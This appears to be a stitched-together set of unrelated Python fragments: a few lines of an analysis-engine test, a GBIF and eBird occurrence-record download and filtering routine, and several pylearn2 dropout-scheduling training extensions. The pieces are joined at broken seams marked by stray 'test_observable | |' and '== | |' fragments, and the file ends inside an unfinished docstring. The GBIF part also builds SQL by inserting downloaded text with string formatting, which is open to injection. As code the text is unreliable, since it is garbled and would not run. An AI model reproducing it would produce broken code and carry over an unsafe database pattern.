engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable | |
dkey = d[0]
except Exception as e:
print(e)
print(download_filters)
# Get the download, if not ready, keep trying
print("Waiting for the Darwin Core Archive.....")
timestamp2 = datetime.now()
gotit = False
while gotit == False:
try:
# Download the file
timestamp = datetime.now()
zipdownload = occurrences.download_get(key=dkey, path=working_directory)
print("Wait time for DWcA creation: "
+ str(datetime.now() - timestamp2))
print("Wait time for DWcA download: "
+ str(datetime.now() - timestamp))
gotit = True
except:
wait = datetime.now() - timestamp2
if wait.seconds > 60*1440:
gotit = True
print("FAILED!!! -- timed out after 24 hrs. ",
"Try again later or split up query with ",
"year paramters")
# Read the relevant files from within the Darwin Core archive
timestamp = datetime.now()
with DwCAReader(zipdownload["path"]) as dwca:
try:
dfRaw = dwca.pd_read('occurrence.txt', low_memory=False)
except Exception as e:
print("Read error:")
print(e)
try:
doi = dwca.metadata.attrib["packageId"]
except Exception as e:
print("DOI error:")
print(e)
try:
citations = dwca.open_included_file('citations.txt').read()
except Exception as e:
citations = "Failed"
print("Citation error:")
print(e)
try:
rights = dwca.open_included_file('rights.txt').read()
except Exception as e:
rights = "Failed"
print("Rights error:")
print(e)
print("Wait time for reading the DwCA: "
+ str(datetime.now() - timestamp))
# Record DWCA metadata
# Store the value summary for the selected fields in a table.
timestamp = datetime.now()
cursor.executescript("""CREATE TABLE GBIF_download_info
(download_key TEXT, doi TEXT, citations TEXT,
rights TEXT);""")
cursor.execute('''INSERT INTO GBIF_download_info (doi, download_key)
VALUES ("{0}", "{1}")'''.format(doi, dkey))
try:
cursor.execute('''UPDATE GBIF_download_info
SET citations = "{0}"
WHERE doi = "{1}"'''.format(citations, doi))
except Exception as e:
print(e)
cursor.execute('''UPDATE GBIF_download_info
SET citations = "Failed"
WHERE doi = "{0}"'''.format(doi))
try:
cursor.execute('''UPDATE GBIF_download_info
SET rights = "{0}"
WHERE doi = "{1}"'''.format(rights, doi))
except Exception as e:
print(e)
cursor.execute('''UPDATE GBIF_download_info
SET rights = "Failed"
WHERE doi = "{0}"'''.format(doi))
print("Stored GBIF Download DOI etc.: "
+ str(datetime.now() - timestamp))
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< SUMMARIZE
timestamp = datetime.now()
# We don't want to count the "UNKNOWNS" we added
if dwca_download == False:
df_raw2 = dfRaw.replace({"UNKNOWN": np.nan})
df_populated1 = pd.DataFrame(df_raw2.count(axis=0).T.iloc[1:])
df_populated1['included(n)'] = df_populated1[0]
df_populated1['populated(n)'] = df_populated1[0]
if dwca_download == True:
df_raw2 = dfRaw.copy()
df_populated1 = pd.DataFrame(df_raw2.count(axis=0).T.iloc[1:])
df_populated1['included(n)'] = len(dfRaw)
df_populated1['populated(n)'] = df_populated1[0]
df_populated2 = df_populated1.filter(items=['included(n)', 'populated(n)'],
axis='columns')
df_populated2.index.name = 'attribute'
df_populated2.to_sql(name='gbif_fields_returned', con=conn,
if_exists='replace')
print("Summarized fields returned: " + str(datetime.now() - timestamp))
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PREPARE
timestamp = datetime.now()
# Rename columns
records1 = dfRaw.rename({"issue": "issues", "id": "record_id"}, axis=1)
# Drop columns
records1 = records1.filter(items=output_schema.keys(), axis=1)
# Populate columns
records1["retrieval_date"] = str(datetime.now())
if filter_set["get_dwca"] == True:
records1["GBIF_download_doi"] = doi
else:
records1["GBIF_download_doi"] = "bypassed"
records1["source"] = "GBIF"
# Add GBIF records to template; replace and fillna to support astype()
records2 = (pd.DataFrame(columns=output_schema.keys())
.combine_first(records1)
# this replace is needed for API method
.replace({"coordinateUncertaintyInMeters": {"UNKNOWN": np.nan},
"radius_m": {"UNKNOWN": np.nan},
"coordinatePrecision": {"UNKNOWN": np.nan},
"nominal_xy_precision": {"UNKNOWN": np.nan},
"individualCount": {"UNKNOWN": 1},
"weight": {"UNKNOWN": 10},
"detection_distance_m": {"UNKNOWN": 0}})
.fillna({"coordinateUncertaintyInMeters": 0,
"radius_m": 0,
"individualCount": 1,
"weight": 10,
"detection_distance_m": 0,
"effort_distance_m": 0,
"coordinate_precision": 1,
"gps_accuracy_m": 30})
.astype(output_schema))
print("Prepared GBIF records for processing: "
+ str(datetime.now() - timestamp))
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< Results
return records2
def process_records(ebird_data, gbif_data, filter_set, taxon_info,
working_directory, query_name):
'''
Summarizes the values in the data frames, populates some fields,
apply filters, summarize what values persisted after filtering. Insert
results into the output db.
Parameters
----------
ebird_data : a data frame of records from eBird
gbif_data : a data frame of records from GBIF
output_database : path to the output database; string
filter_set : the filter set dictionary
taxon_info : the taxon information dictionary
Returns
-------
filtered_records : a data frame of filtered records.
'''
timestamp = datetime.now()
# Create or connect to the database
output_database = working_directory + query_name + ".sqlite"
conn = sqlite3.connect(output_database, isolation_level='DEFERRED')
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< MANAGE DATA TYPES
schema = output_schema
string_atts = {key:value for (key, value) in schema.items() if schema[key] == 'str'}
if ebird_data is not None:
ebird_data = ebird_data.astype(string_atts)
if gbif_data is not None:
gbif_data = gbif_data.astype(string_atts)
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< REMOVE EBIRD FROM GBIF
if gbif_data is not None:
if ebird_data is not None:
gbif_data = gbif_data[gbif_data["collectionCode"].str.contains("EBIRD*") == False]
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< COMBINE DATA FRAMES
if ebird_data is None:
df_unfiltered = gbif_data
if gbif_data is None:
df_unfiltered = ebird_data
if gbif_data is not None and ebird_data is not None:
# Concatenate the gbif and ebird tables
df_unfiltered = pd.concat([ebird_data, gbif_data])
print("Prepared data frames for processing: "
+ str(datetime.now() - timestamp))
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< SUMMARIZE VALUES
timestamp = datetime.now()
# Make a list of columns to summarize values from
do_not_summarize = ['decimalLatitude', 'decimalLongitude',
'GBIF_download_doi', 'coordinateUncertaintyInMeters',
'detection_distance_m', 'eventDate', 'eventRemarks',
'filter_set_name', 'footprintSRS', 'footprintWKT',
'gbif_id', 'ebird_id', "effort_distance_m",
'general_remarks', 'georeferencedBy', 'habitat',
'georeferenceRemarks', 'identificationQualifier',
'identifiedBy', 'identifiedRemarks', 'individualCount',
'informationWitheld', 'locality',
'locationAccordingTo', 'locationRemarks', "modified",
'occurrenceRemarks', 'radius_m', 'record_id',
'recordedBy', 'retrieval_date', 'taxonConceptID',
'verbatimLocality', 'weight', 'weight_notes']
# Make a function to do the summarizing
def summarize_values(dataframe, step):
"""
Loops through columns and gets a count of unique values. Packages in
a df.
"""
attributes = []
summarize = [x for x in dataframe.columns if x not in do_not_summarize]
for column in summarize:
value_count = dataframe['record_id'].groupby(dataframe[column]).count()
value_df = (pd.DataFrame(value_count)
.reset_index()
.rename({'record_id': step, column: 'value'}, axis=1))
value_df["attribute"] = column
value_df = value_df[["attribute", "value", step]]
if value_df.empty == False:
attributes.append(value_df)
result = pd.concat(attributes)
return result
# Store value summary in a data frame
acquired = summarize_values(dataframe=df_unfiltered, step='acquired')
# Summarize sources
source_df1 = df_unfiltered[['institutionID', 'collectionCode',
'datasetName', 'record_id']]
source_summary1 = (source_df1
.groupby(by=['institutionID', 'collectionCode',
'datasetName'])
.size()
.reset_index(name='acquired'))
print("Summarized values acquired: " + str(datetime.now() - timestamp))
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< POPULATE SOME COLUMNS
timestamp = datetime.now()
df_unfiltered.fillna(value={'individualCount': int(1)}, inplace=True)
df_unfiltered["weight"] = 10
df_unfiltered["weight_notes"] = ""
df_unfiltered["taxon_id"] = taxon_info["ID"]
df_unfiltered["gbif_id"] = taxon_info["GBIF_ID"]
df_unfiltered["ebird_id"] = taxon_info["EBIRD_ID"]
df_unfiltered["detection_distance_m"] = taxon_info["detection_distance_m"]
df_unfiltered["filter_set_name"] = filter_set["name"]
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< COORDINATE PRECISION
'''In WGS84, coordinate precision is limited by longitude and varies across
latitudes and number of digits provided. Thus, coordinates have a nominal
precision that may limit values. Populate a column for this...'''
# Trim decimal length to 5 digits (lat and long).
# Anything more is false precision.
df_unfiltered["decimalLatitude"] = df_unfiltered["decimalLatitude"].apply(lambda x: coord_rounded(x, 5))
df_unfiltered["decimalLongitude"] = df_unfiltered["decimalLongitude"].apply(lambda x: coord_rounded(x, 5))
# Drop rows without a valid latitude or longitude
df_unfiltered.dropna(subset=["decimalLatitude", "decimalLongitude"],
inplace=True)
# Calculate the number of digits for latitude and longitude
df_unfiltered['digits_latitude'] = [len(x.split(".")[1]) for x in df_unfiltered['decimalLatitude']]
df_unfiltered['digits_longitude'] = [len(x.split(".")[1]) for x in df_unfiltered['decimalLongitude']]
# Estimate longitude precisions
df_unfiltered = nominal_x_precision(dataframe=df_unfiltered,
lat_column="decimalLatitude",
digits_column="digits_longitude",
output_column="nominal_x_precision")
# Latitude precision; lookup for latitude precision
digitsY = {1: 11112.0, 2: 1111.2, 3: 111.1, 4: 11.1, 5: 1.1}
df_unfiltered["nominal_y_precision"] = df_unfiltered["digits_latitude"].apply(lambda x: digitsY[x])
# Put the larger of the two nominal precisions in a column
df_unfiltered["nominal_xy_precision"] = np.where(df_unfiltered["nominal_y_precision"] > df_unfiltered["nominal_x_precision"], df_unfiltered["nominal_y_precision"], df_unfiltered["nominal_x_precision"])
# Clean up
df_unfiltered.drop(["temp", "temp2", "digits_latitude", "digits_longitude",
"nominal_x_precision", "nominal_y_precision"], axis=1,
inplace=True)
# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< BUFFER RADIUS
'''
Calculate a buffer distance from various parameters for the
point-radius method. Compilation has to differ with data source and
whether the user chose to use a default coordinate uncertainty. Components
of radius may include coordinateUncertaintyInMeters, coordinatePrecision,
GPS_accuracy_m, effort_distance_m, detection_distance_m.
Records are broken apart by source (GBIF, GBIF/EOD, EBD), processed,
and then concatenated in order to account for all conditions.
If footprintWKT is provided, it will be used by spatial_output instead
of point buffering.
'''
# Records from GBIF with coordinate uncertainty (georeferenced)
georef = df_unfiltered[df_unfiltered["coordinateUncertaintyInMeters"] > 0.0].copy()
if georef.empty == False:
#georef.fillna({"coordinatePrecision": 0.00001}, inplace=True)
georef["gps_accuracy_m"] = np.where(georef["eventDate"].apply(lambda x: datetime.strptime(x, "%Y-%m-%dT%H:%M:%S").year) < 2000, 100, 30)
georef["radius_m"] = georef["coordinateUncertaintyInMeters"]
print("Number of georeferenced GBIF records: " + str(len(georef)))
# Records from GBIF without coordinate uncertainty
gbif_nogeo = df_unfiltered[(df_unfiltered["coordinateUncertaintyInMeters"] == 0.0) & (df_unfiltered["collectionCode"].str.contains("EBIRD*") == False)].copy()
if gbif_nogeo.empty == False:
gbif_nogeo["gps_accuracy_m"] = np.where(gbif_nogeo["eventDate"].apply(lambda x: datetime.strptime(x, "%Y-%m-%dT%H:%M:%S").year) < 2000, 100, 30)
if filter_set["default_coordUncertainty"] is not None:
print("Applying default coordinate uncertainties for GBIF records")
#gbif_nogeo.fillna({"coordinatePrecision": 0.00001}, inplace=True)
gbif_nogeo["radius_m"] = filter_set["default_coordUncertainty"]
if filter_set["default_coordUncertainty"] is None:
print("Approximating coordinate uncertanties for GBIF records")
#gbif_nogeo.fillna({"coordinatePrecision": 0.00001}, inplace=True)
gbif_nogeo["radius_m"] = gbif_nogeo["gps_accuracy_m"] + gbif_nogeo["detection_distance_m"] + gbif_nogeo["effort_distance_m"]
# Records from EBD
ebd_geo = df_unfiltered[df_unfiltered["source"] == "eBird"].copy()
if ebd_geo.empty == False:
#ebd_geo.fillna({"coordinatePrecision": 0.00001}, inplace=True)
ebd_geo["gps_accuracy_m"] = np.where(ebd_geo["eventDate"].apply(lambda x: datetime.strptime(x, "%Y-%m-%d").year) < 2000, 100, 30)
ebd_geo["radius_m"] = ebd_geo["effort_distance_m"] + ebd_geo["gps_accuracy_m"] + ebd_geo["detection_distance_m"]
# Records from EOD (via GBIF)
eod_nogeo = df_unfiltered[(df_unfiltered["source"] == "GBIF") & (df_unfiltered["collectionCode"].str.contains("EBIRD*") == | |
from pylearn2.space import NullSpace
from theano import config
from pylearn2.utils import sharedX
import functools
import numpy as np
from pylearn2.train_extensions import TrainExtension
class DropoutScaler(TrainExtension):
    """Train extension that adapts per-layer dropout include probabilities.

    After each monitoring epoch, every layer except the first has its
    include probability set to ``0.25 / activation_fraction`` of the
    previous layer (as reported by that layer's ``_percentage_activated``
    monitor channel), clamped to ``[0.2, 0.8]``. The dropout scale is kept
    at the reciprocal of the include probability.

    Parameters
    ----------
    estimate_set : str
        Monitoring-set prefix ("train", "valid", ...) used to look up the
        activation channels.
    """

    def __init__(self, estimate_set="train"):
        self.estimate_set = estimate_set

    @functools.wraps(TrainExtension.setup)
    def setup(self, model, dataset, algorithm):
        # Expose the current include probability and scale of every
        # droppable layer as monitor channels so they can be tracked.
        monitor = model.monitor
        for layer_name in algorithm.cost.input_include_probs:
            channel_name = self.estimate_set + "_" + layer_name
            monitor.add_channel(
                name=channel_name + "_dropout_inc_prob",
                ipt=None,
                val=algorithm.cost.input_include_probs[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
            monitor.add_channel(
                name=channel_name + "_dropout_scale",
                ipt=None,
                val=algorithm.cost.input_scales[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)

    @functools.wraps(TrainExtension.on_monitor)
    def on_monitor(self, model, dataset, algorithm):
        channels = model.monitor.channels
        for i in range(1, len(model.layers)):
            # Most recent activation-fraction estimate of the layer that
            # feeds layer i.
            channel_name = (self.estimate_set + "_"
                            + model.layers[i - 1].layer_name
                            + "_percentage_activated")
            last_activation_estimate = channels[channel_name].val_record[-1]
            # Aim for a 25% effective activation, clamped to [0.2, 0.8].
            dropout_include_prob = min(max(0.25 / last_activation_estimate, 0.2), 0.8)
            dropout_scale = 1.0 / dropout_include_prob
            algorithm.cost.input_include_probs[model.layers[i].layer_name].set_value(
                np.cast[config.floatX](dropout_include_prob))
            algorithm.cost.input_scales[model.layers[i].layer_name].set_value(
                np.cast[config.floatX](dropout_scale))
class DropoutSwitcher(TrainExtension):
    """Switches dropout include probabilities to preset values at set epochs.

    When the internal monitor-event counter equals ``trigger_epochs[i]``,
    the ``{layer_name: include_prob}`` mapping ``dropout_prob_values[i]``
    is applied (scales are set to the reciprocal). Optionally, the output
    layer's learning-rate scale is set to the squared mean include
    probability across all layers.

    Parameters
    ----------
    trigger_epochs : list of int
        Monitor-event counts at which to switch.
    dropout_prob_values : list of dict
        Parallel to ``trigger_epochs``; per-layer include probabilities.
    scale_learning_rate : bool
        If True, rescale the last layer's ``W_lr_scale`` after each switch.
    """

    def __init__(self, trigger_epochs, dropout_prob_values, scale_learning_rate=False):
        self.trigger_epochs = trigger_epochs
        self.dropout_prob_values = dropout_prob_values
        self.scale_learning_rate = scale_learning_rate
        # Monitor events seen so far; setup() itself counts as one event.
        self.count = 0

    def _rescale_last_layer_lr(self, model, algorithm):
        # Set the output layer's learning-rate scale to the squared mean
        # include probability over all layers.
        mean_prob = 0.0
        for layer in model.layers:
            mean_prob += algorithm.cost.input_include_probs[layer.layer_name].get_value()
        mean_prob /= len(model.layers)
        model.layers[-1].W_lr_scale = mean_prob * mean_prob

    @functools.wraps(TrainExtension.setup)
    def setup(self, model, dataset, algorithm):
        # Expose the include probability and scale of every droppable layer
        # as monitor channels.
        monitor = model.monitor
        for layer_name in algorithm.cost.input_include_probs:
            monitor.add_channel(
                name=layer_name + "_dropout_inc_prob",
                ipt=None,
                val=algorithm.cost.input_include_probs[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
            monitor.add_channel(
                name=layer_name + "_dropout_scale",
                ipt=None,
                val=algorithm.cost.input_scales[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
        if self.scale_learning_rate:
            self._rescale_last_layer_lr(model, algorithm)
        self.count += 1

    @functools.wraps(TrainExtension.on_monitor)
    def on_monitor(self, model, dataset, algorithm):
        # NOTE: the original shadowed the trigger loop index with the inner
        # layer loop index; distinct names are used here.
        for idx, trigger in enumerate(self.trigger_epochs):
            if trigger == self.count:
                for layer_name, include_prob in self.dropout_prob_values[idx].items():
                    algorithm.cost.input_include_probs[layer_name].set_value(
                        np.cast[config.floatX](include_prob))
                    algorithm.cost.input_scales[layer_name].set_value(
                        np.cast[config.floatX](1.0 / include_prob))
                if self.scale_learning_rate:
                    self._rescale_last_layer_lr(model, algorithm)
                break
        self.count += 1
class DropoutActivationLinearScaler(TrainExtension):
    """Adapts dropout so each layer's activation tracks a linearly growing target.

    Every monitoring epoch, each droppable layer after the first (unless it
    is listed in ``algorithm.cost.constant_layers``) gets the include
    probability ``target / previous_layer_activation``, clamped to
    ``[min_incl_prob, max_incl_prob]``. The target activation fraction is
    then incremented by ``decay_factor`` (capped at
    ``max_target_act_fraction``), and the first droppable layer is driven
    at twice the updated target.

    Parameters
    ----------
    decay_factor : float
        Additive per-epoch increment of the target activation fraction.
    min_incl_prob, max_incl_prob : float
        Clamp bounds for the include probability.
    target_act_fraction : float
        Initial target activation fraction.
    max_target_act_fraction : float
        Upper cap for the target activation fraction.
    estimate_set : str
        Monitoring-set prefix used to look up activation channels.
    """

    def __init__(self, decay_factor, min_incl_prob, max_incl_prob,
                 target_act_fraction, max_target_act_fraction,
                 estimate_set="train"):
        self.decay_factor = decay_factor
        self.min_incl_prob = min_incl_prob
        self.max_incl_prob = max_incl_prob
        # Shared variable so the current target can be monitored as a channel.
        self.target_act_fraction = sharedX(target_act_fraction)
        self.max_target_act_fraction = max_target_act_fraction
        self.estimate_set = estimate_set

    @functools.wraps(TrainExtension.setup)
    def setup(self, model, dataset, algorithm):
        # Register channels for each layer's dropout settings and for the
        # moving activation target. (The original re-checked dict
        # membership inside the loop over the same dict; that check was
        # always true and has been dropped.)
        monitor = model.monitor
        for layer_name in algorithm.cost.input_include_probs:
            channel_name = self.estimate_set + "_" + layer_name
            monitor.add_channel(
                name=channel_name + "_dropout_inc_prob",
                ipt=None,
                val=algorithm.cost.input_include_probs[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
            monitor.add_channel(
                name=channel_name + "_dropout_scale",
                ipt=None,
                val=algorithm.cost.input_scales[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
        monitor.add_channel(
            name="target_act_fraction",
            ipt=None,
            val=self.target_act_fraction,
            data_specs=(NullSpace(), ''),
            dataset=dataset)

    @functools.wraps(TrainExtension.on_monitor)
    def on_monitor(self, model, dataset, algorithm):
        channels = model.monitor.channels
        # Names of layers that participate in dropout, in network order.
        droppable = [layer.layer_name for layer in model.layers
                     if layer.layer_name in algorithm.cost.input_include_probs]
        for i in range(1, len(droppable)):
            if droppable[i] in algorithm.cost.constant_layers:
                continue
            channel_name = (self.estimate_set + "_" + droppable[i - 1]
                            + "_percentage_activated")
            last_activation_estimate = channels[channel_name].val_record[-1]
            include_prob = (self.target_act_fraction.get_value()
                            / last_activation_estimate)
            include_prob = min(max(include_prob, self.min_incl_prob),
                               self.max_incl_prob)
            algorithm.cost.set_dropout_value(droppable[i], include_prob)
        # Advance the target fraction linearly, capped at its maximum.
        act_frac_val = self.target_act_fraction.get_value() + self.decay_factor
        if act_frac_val > self.max_target_act_fraction:
            act_frac_val = self.max_target_act_fraction
        self.target_act_fraction.set_value(np.cast[config.floatX](act_frac_val))
        # The first droppable layer follows twice the (freshly updated)
        # target, clamped to the same bounds.
        if droppable and droppable[0] not in algorithm.cost.constant_layers:
            l0_include_prob = self.target_act_fraction.get_value() * 2
            l0_include_prob = min(max(l0_include_prob, self.min_incl_prob),
                                  self.max_incl_prob)
            algorithm.cost.set_dropout_value(droppable[0], l0_include_prob)
class DropoutActivationSetter(TrainExtension):
    """Sets dropout from activations against a fixed target fraction.

    Every monitoring epoch, each layer after the first gets the include
    probability ``target_act_fraction / previous_layer_activation``,
    clamped to ``[min_incl_prob, max_incl_prob]``; the dropout scale is
    kept at the reciprocal. The target itself is constant.

    Parameters
    ----------
    min_incl_prob, max_incl_prob : float
        Clamp bounds for the include probability.
    target_act_fraction : float
        Desired effective activation fraction per layer.
    estimate_set : str
        Monitoring-set prefix used to look up activation channels.
    """

    def __init__(self, min_incl_prob, max_incl_prob, target_act_fraction,
                 estimate_set="train"):
        self.min_incl_prob = min_incl_prob
        self.max_incl_prob = max_incl_prob
        # Shared variable so the target can be monitored as a channel.
        self.target_act_fraction = sharedX(target_act_fraction)
        self.estimate_set = estimate_set

    @functools.wraps(TrainExtension.setup)
    def setup(self, model, dataset, algorithm):
        # Register channels for each layer's dropout settings and for the
        # (constant) activation target.
        monitor = model.monitor
        for layer_name in algorithm.cost.input_include_probs:
            channel_name = self.estimate_set + "_" + layer_name
            monitor.add_channel(
                name=channel_name + "_dropout_inc_prob",
                ipt=None,
                val=algorithm.cost.input_include_probs[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
            monitor.add_channel(
                name=channel_name + "_dropout_scale",
                ipt=None,
                val=algorithm.cost.input_scales[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
        monitor.add_channel(
            name="target_act_fraction",
            ipt=None,
            val=self.target_act_fraction,
            data_specs=(NullSpace(), ''),
            dataset=dataset)

    @functools.wraps(TrainExtension.on_monitor)
    def on_monitor(self, model, dataset, algorithm):
        channels = model.monitor.channels
        # The target is not modified in this loop, so read it once.
        target = self.target_act_fraction.get_value()
        for i in range(1, len(model.layers)):
            channel_name = (self.estimate_set + "_"
                            + model.layers[i - 1].layer_name
                            + "_percentage_activated")
            last_activation_estimate = channels[channel_name].val_record[-1]
            include_prob = target / last_activation_estimate
            include_prob = min(max(include_prob, self.min_incl_prob),
                               self.max_incl_prob)
            algorithm.cost.input_include_probs[model.layers[i].layer_name].set_value(
                np.cast[config.floatX](include_prob))
            algorithm.cost.input_scales[model.layers[i].layer_name].set_value(
                np.cast[config.floatX](1.0 / include_prob))
class DropoutActivationExponentialScaler(TrainExtension):
    """Adapts dropout to an exponentially growing target activation fraction.

    Every monitoring epoch, each layer after the first gets the include
    probability ``target / previous_layer_activation``, clamped to
    ``[min_incl_prob, max_incl_prob]``. The target is then multiplied by
    ``decay_factor`` (capped at ``max_target_act_fraction``), and the
    input layer mirrors the second layer's include probability.

    Parameters
    ----------
    decay_factor : float
        Multiplicative per-epoch growth of the target activation fraction.
    min_incl_prob, max_incl_prob : float
        Clamp bounds for the include probability.
    target_act_fraction : float
        Initial target activation fraction.
    max_target_act_fraction : float
        Upper cap for the target activation fraction.
    estimate_set : str
        Monitoring-set prefix used to look up activation channels.
    """

    def __init__(self, decay_factor, min_incl_prob, max_incl_prob,
                 target_act_fraction, max_target_act_fraction,
                 estimate_set="train"):
        self.decay_factor = decay_factor
        self.min_incl_prob = min_incl_prob
        self.max_incl_prob = max_incl_prob
        # Shared variable so the current target can be monitored as a channel.
        self.target_act_fraction = sharedX(target_act_fraction)
        self.max_target_act_fraction = max_target_act_fraction
        self.estimate_set = estimate_set

    @functools.wraps(TrainExtension.setup)
    def setup(self, model, dataset, algorithm):
        # Register channels for each layer's dropout settings and for the
        # moving activation target.
        monitor = model.monitor
        for layer_name in algorithm.cost.input_include_probs:
            channel_name = self.estimate_set + "_" + layer_name
            monitor.add_channel(
                name=channel_name + "_dropout_inc_prob",
                ipt=None,
                val=algorithm.cost.input_include_probs[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
            monitor.add_channel(
                name=channel_name + "_dropout_scale",
                ipt=None,
                val=algorithm.cost.input_scales[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
        monitor.add_channel(
            name="target_act_fraction",
            ipt=None,
            val=self.target_act_fraction,
            data_specs=(NullSpace(), ''),
            dataset=dataset)

    @functools.wraps(TrainExtension.on_monitor)
    def on_monitor(self, model, dataset, algorithm):
        channels = model.monitor.channels
        # The target is not modified inside this loop, so read it once.
        target = self.target_act_fraction.get_value()
        for i in range(1, len(model.layers)):
            channel_name = (self.estimate_set + "_"
                            + model.layers[i - 1].layer_name
                            + "_percentage_activated")
            last_activation_estimate = channels[channel_name].val_record[-1]
            include_prob = target / last_activation_estimate
            include_prob = min(max(include_prob, self.min_incl_prob),
                               self.max_incl_prob)
            algorithm.cost.input_include_probs[model.layers[i].layer_name].set_value(
                np.cast[config.floatX](include_prob))
            algorithm.cost.input_scales[model.layers[i].layer_name].set_value(
                np.cast[config.floatX](1.0 / include_prob))
        # Grow the target exponentially, capped at its maximum.
        act_frac_val = self.target_act_fraction.get_value() * self.decay_factor
        if act_frac_val > self.max_target_act_fraction:
            act_frac_val = self.max_target_act_fraction
        self.target_act_fraction.set_value(np.cast[config.floatX](act_frac_val))
        # Mirror the second layer's include probability onto the input layer.
        l0_include_prob = algorithm.cost.input_include_probs[
            model.layers[1].layer_name].get_value()
        algorithm.cost.input_include_probs[model.layers[0].layer_name].set_value(
            np.cast[config.floatX](l0_include_prob))
        algorithm.cost.input_scales[model.layers[0].layer_name].set_value(
            np.cast[config.floatX](1.0 / l0_include_prob))
class DropoutLinearAnnealer(TrainExtension):
    """Linearly anneals dropout away over training.

    Every monitoring epoch, each droppable layer's include probability is
    increased by ``decay_factor``, capped at ``max_incl_prob``; the scale
    is kept at the reciprocal.

    Parameters
    ----------
    decay_factor : float
        Additive per-epoch increment of the include probability.
    max_incl_prob : float
        Upper cap for the include probability.
    """

    def __init__(self, decay_factor, max_incl_prob):
        self.decay_factor = decay_factor
        self.max_incl_prob = max_incl_prob

    @functools.wraps(TrainExtension.setup)
    def setup(self, model, dataset, algorithm):
        # Expose each droppable layer's include probability and scale as
        # monitor channels.
        monitor = model.monitor
        for layer_name in algorithm.cost.input_include_probs:
            monitor.add_channel(
                name=layer_name + "_dropout_inc_prob",
                ipt=None,
                val=algorithm.cost.input_include_probs[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
            monitor.add_channel(
                name=layer_name + "_dropout_scale",
                ipt=None,
                val=algorithm.cost.input_scales[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)

    @functools.wraps(TrainExtension.on_monitor)
    def on_monitor(self, model, dataset, algorithm):
        for layer in model.layers:
            layer_name = layer.layer_name
            if layer_name not in algorithm.cost.input_include_probs:
                continue
            include_prob = (algorithm.cost.input_include_probs[layer_name].get_value()
                            + self.decay_factor)
            if include_prob > self.max_incl_prob:
                include_prob = self.max_incl_prob
            algorithm.cost.input_include_probs[layer_name].set_value(
                np.cast[config.floatX](include_prob))
            algorithm.cost.input_scales[layer_name].set_value(
                np.cast[config.floatX](1.0 / include_prob))
class DropoutLinearMeanActivationSetter(TrainExtension):
    """Maps each layer's mean activation linearly to a keep probability.

    Every monitoring epoch, the previous layer's ``_mean_activation``
    channel value is rescaled from the range ``[0.01, 0.4]`` onto
    ``[0, 1]`` (clamped) and then mapped linearly onto
    ``[min_keep_prob, max_keep_prob]`` to become the layer's include
    probability; the dropout scale is kept at the reciprocal.

    Parameters
    ----------
    min_keep_prob, max_keep_prob : float
        Output range of the include probability.
    estimate_set : str
        Monitoring-set prefix used to look up activation channels.
    """

    def __init__(self, min_keep_prob=0.4, max_keep_prob=0.8, estimate_set="train"):
        self.min_keep_prob = min_keep_prob
        self.max_keep_prob = max_keep_prob
        self.estimate_set = estimate_set

    @functools.wraps(TrainExtension.setup)
    def setup(self, model, dataset, algorithm):
        # Expose each droppable layer's include probability and scale as
        # monitor channels.
        monitor = model.monitor
        for layer_name in algorithm.cost.input_include_probs:
            monitor.add_channel(
                name=layer_name + "_dropout_inc_prob",
                ipt=None,
                val=algorithm.cost.input_include_probs[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
            monitor.add_channel(
                name=layer_name + "_dropout_scale",
                ipt=None,
                val=algorithm.cost.input_scales[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)

    @functools.wraps(TrainExtension.on_monitor)
    def on_monitor(self, model, dataset, algorithm):
        channels = model.monitor.channels
        for i in range(1, len(model.layers)):
            channel_name = (self.estimate_set + "_"
                            + model.layers[i - 1].layer_name
                            + "_mean_activation")
            mean_activation = channels[channel_name].val_record[-1]
            # Rescale the mean activation from [0.01, 0.4] onto [0, 1].
            act_scaled = (mean_activation - 0.01) / (0.4 - 0.01)
            act_scaled = min(max(act_scaled, 0.0), 1.0)
            # Linear map onto [min_keep_prob, max_keep_prob]. (This is a
            # keep/include probability, not a drop probability.)
            include_prob = (act_scaled * (self.max_keep_prob - self.min_keep_prob)
                            + self.min_keep_prob)
            algorithm.cost.input_include_probs[model.layers[i].layer_name].set_value(
                np.cast[config.floatX](include_prob))
            algorithm.cost.input_scales[model.layers[i].layer_name].set_value(
                np.cast[config.floatX](1.0 / include_prob))
class DropoutExponentialAnnealer(TrainExtension):
    """Train extension that exponentially anneals dropout include probabilities.

    After every monitoring step each layer's include (keep) probability is
    multiplied by `decay_factor` and clipped at `max_incl_prob`; the matching
    activation scale is kept at ``1 / keep_prob``.  Optionally the learning-rate
    scale of the last layer tracks the mean include probability, and the input
    layer's probability can be held fixed.

    Parameters
